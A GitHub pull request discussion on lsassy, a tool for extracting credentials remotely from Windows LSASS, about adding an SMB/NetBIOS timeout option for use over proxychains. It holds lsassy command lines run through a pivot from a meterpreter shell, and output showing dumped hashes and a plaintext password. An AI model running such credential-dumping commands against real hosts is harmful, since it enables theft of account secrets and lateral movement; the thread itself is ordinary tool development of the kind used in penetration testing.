login-securite / lsassy

Extract credentials from lsass remotely
https://en.hackndo.com/remote-lsass-dump-passwords/
MIT License

Feature/nmb timeout #50

Closed Script-Nomad closed 3 years ago

Script-Nomad commented 3 years ago

This PR adds a new argument to the CLI for LSASSY to support specifying a nmb/smb connection timeout value for Impacket in order to better support slow connections such as with proxychains.

My specific situation was that I was able to establish a meterpreter shell on a remote network

proxychains lsassy -d example.com -u someuser -p badpassword123 10.172.47.161    
[proxychains] config file found: /etc/proxychains.conf                                                                                
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4                                  
[proxychains] DLL init: proxychains-ng 4.14                                                                
[proxychains] Strict chain  ...  127.0.0.1:1081  ...  10.172.47.161:445  ...  OK                
[proxychains] Strict chain  ...  127.0.0.1:1081  ...  10.172.47.161:135  ...  OK                        
[proxychains] Strict chain  ...  127.0.0.1:1081  ...  10.172.47.161:52580  ...  OK                         
ERROR:pypykatz:Failed to automatically detect correct LSA template!                                                   
Traceback (most recent call last):                                                                      
  File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 188, in get_lsa                         
    lsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template, self.sysinfo)                                 
  File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/lsa_decryptor.py", line 20, in choose                        
    return LsaDecryptor_NT6(reader, decryptor_template, sysinfo)                                                                      
  File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/lsa_decryptor_nt6.py", line 22, in __init__                  
    self.acquire_crypto_material()                                                                                                    
  File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/lsa_decryptor_nt6.py", line 26, in acquire_crypto_material               
    sigpos = self.find_signature()                                                                      
  File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/lsa_decryptor_nt6.py", line 44, in find_signature                        
    fl = self.reader.find_in_module('lsasrv.dll', self.decryptor_template.key_pattern.signature)               
  File "/usr/lib/python3/dist-packages/minidump/minidumpreader.py", line 220, in find_in_module                
    t = self.reader.search_module(module_name, pattern)                                                        
  File "/usr/lib/python3/dist-packages/minidump/minidumpreader.py", line 270, in search_module                            
    t+= ms.search(pattern, self.file_handle)                                                                              
  File "/usr/lib/python3/dist-packages/minidump/common_structs.py", line 124, in search                                   
    data = file_handler.read(self.size)                                                                                               
  File "/usr/local/lib/python3.8/dist-packages/lsassy/modules/impacketfile.py", line 77, in read                                      
    value = self._conn.readFile(self._tid, self._fid, self._currentOffset, size + self._buffer_min_size)                              
  File "/usr/local/lib/python3.8/dist-packages/lsassy/modules/impacketconnection.py", line 158, in readFile                           
    return self._conn.readFile(tid, fid, offset, size, singleCall=False)                     
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 594, in readFile     
    bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)                
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1908, in read_andx            
    return self.read(tid, fid, offset, max_size, wait_answer)                                
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1243, in read                                                          
    ans = self.recvSMB(packetID)                                          
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 416, in recvSMB                                                        
    data = self._NetBIOSSession.recv_packet(self._timeout)                                                                            
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 914, in recv_packet                                                     
    data = self.__read(timeout)                                           
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 1004, in __read                                                         
    data2 = self.read_function(length, timeout)
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 986, in non_polling_read                                                
    raise NetBIOSTimeout                                                  
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out. 
[proxychains] Strict chain  ...  127.0.0.1:1081  ...  10.172.47.161:445  ...  OK    
[X] [10.172.47.161] Unknown error                                                   

I made a couple of changes. First, I added the -nmb-timeout argument, which gets forwarded to ImpacketConnection.Options() and is passed as the timeout value for all impacket connections going forward. By default, this timeout value is 5, which is fine for most stable connections, but not for proxychaining.

I also modified the fileRead() function so that it will raise an exception if the NetBIOSTimeout is encountered so that the user can be notified and change their arguments accordingly. Further, I've modified the default argument for -nmb-timeout to 10 seconds, which is plenty of time for most proxy chains. Here is an example with a second proxy in the chain just to demonstrate that it works.

proxychains lsassy --nmb-timeout 10 -m 1 -d example.com -u someuser -p badpassword123 10.172.47.161
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.100.0.10:1080-<>-127.0.0.1:1081-<><>-10.172.47.161:445-<><>-OK
|S-chain|-<>-10.100.0.10:1080-<>-127.0.0.1:1081-<><>-10.172.47.161:135-<><>-OK
|S-chain|-<>-10.100.0.10:1080-<>-127.0.0.1:1081-<><>-10.172.47.161:52580-<><>-OK
[+] [10.172.47.161] example\administrator  [NT]001122334455667788990102030405060708090a:[SHA1]001122334455667788990102030405060708090a
[+] [10.172.47.161] example\someuser  baddpassword

Note: Had some dirty files from merging the latest lsassy in the PR. Those can be squashed.
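The traceback above ends in impacket's non-polling NetBIOS read giving up after the configured number of seconds, which is why a single global timeout is the wrong knob for a slow proxied link. The following is an added illustration of that mechanism, not code from lsassy or impacket: a length-prefixed NetBIOS session packet is read from a socket under a per-call deadline, a stand-in `NetBIOSTimeout` exception (same name as impacket's, but defined here) is raised when the peer stays silent, and an argparse option mirrors the PR's `--nmb-timeout` default of 10 seconds. The helper `read_with_delayed_peer` is a constructed scenario that plays a slow peer over a local socketpair; all names in the block are assumptions for the example.

```python
import argparse
import socket
import threading
import time


class NetBIOSTimeout(Exception):
    """Stand-in for impacket.nmb.NetBIOSTimeout: the peer sent nothing within the deadline."""


def read_exact(sock, length, timeout):
    """Read exactly `length` bytes, giving up once `timeout` seconds have elapsed.

    Mirrors the shape of a non-polling read: one deadline for the whole call,
    so a slow proxy hop that delays the first byte past the deadline is a timeout.
    """
    deadline = time.monotonic() + timeout
    buf = bytearray()
    while len(buf) < length:
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            raise NetBIOSTimeout(f"no data within {timeout}s")
        sock.settimeout(remaining)
        try:
            chunk = sock.recv(length - len(buf))
        except socket.timeout:
            raise NetBIOSTimeout(f"no data within {timeout}s") from None
        if not chunk:
            raise ConnectionError("peer closed the session")
        buf += chunk
    return bytes(buf)


def recv_session_packet(sock, timeout):
    """NetBIOS session service framing: 1-byte type, 3-byte big-endian length, payload."""
    header = read_exact(sock, 4, timeout)
    ptype = header[0]
    length = int.from_bytes(header[1:4], "big")
    return ptype, read_exact(sock, length, timeout)


def build_session_packet(ptype, payload):
    """Inverse of recv_session_packet, used by the constructed peer below."""
    return bytes([ptype]) + len(payload).to_bytes(3, "big") + payload


def parse_args(argv):
    """CLI surface matching the PR's option: a dedicated NetBIOS/SMB read timeout."""
    parser = argparse.ArgumentParser(description="timeout option example (assumed)")
    parser.add_argument("--nmb-timeout", type=float, default=10,
                        help="seconds to wait for each SMB/NetBIOS read (default: 10)")
    return parser.parse_args(argv)


def read_with_delayed_peer(delay, timeout):
    """Constructed scenario: the peer answers only after `delay` seconds.

    Returns the payload when it arrives within `timeout`, or None on NetBIOSTimeout,
    so a caller can report the condition instead of an 'Unknown error'.
    """
    client, peer = socket.socketpair()
    payload = b"constructed-smb-message"

    def slow_peer():
        time.sleep(delay)
        try:
            peer.sendall(build_session_packet(0x00, payload))
        except OSError:
            pass  # client already gave up and closed; nothing left to do

    worker = threading.Thread(target=slow_peer)
    worker.start()
    try:
        _, data = recv_session_packet(client, timeout)
        return data
    except NetBIOSTimeout:
        return None
    finally:
        worker.join()
        client.close()
        peer.close()


if __name__ == "__main__":
    opts = parse_args([])
    print("prompt peer:", read_with_delayed_peer(0.0, opts.nmb_timeout))
    print("slow peer, 0.2s budget:", read_with_delayed_peer(0.6, 0.2))
```

The two calls at the bottom show the same peer succeeding under the default budget and failing under a short one; raising a named exception at the read layer, as the PR does for `NetBIOSTimeout`, is what lets the CLI tell the user to raise the timeout rather than printing a generic failure.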

Hackndo commented 3 years ago

Hey there, thank you for your PR. Current work is being done on version 3.0.0 (see associated branch), and the tool has been re-written from scratch. I just added your timeout to SMB connection in here: https://github.com/Hackndo/lsassy/commit/354d2d5500e0579605e544b3e61be14e4208204d If you want, you can try it out and tell me if it works for you. Cheerz

Script-Nomad commented 3 years ago

Lol, sadly, the host I was testing this on is no longer live, so it looks like my temporary development environment just walked out of his office.

After looking at the code though, I think this achieves the same goals. I only separated the nmb-timeout from the lsassy timeout since I wasn't sure what else that timeout value would affect. In any case, I'm totally fine with this. Looking forward to the 3.0.0 release :+1: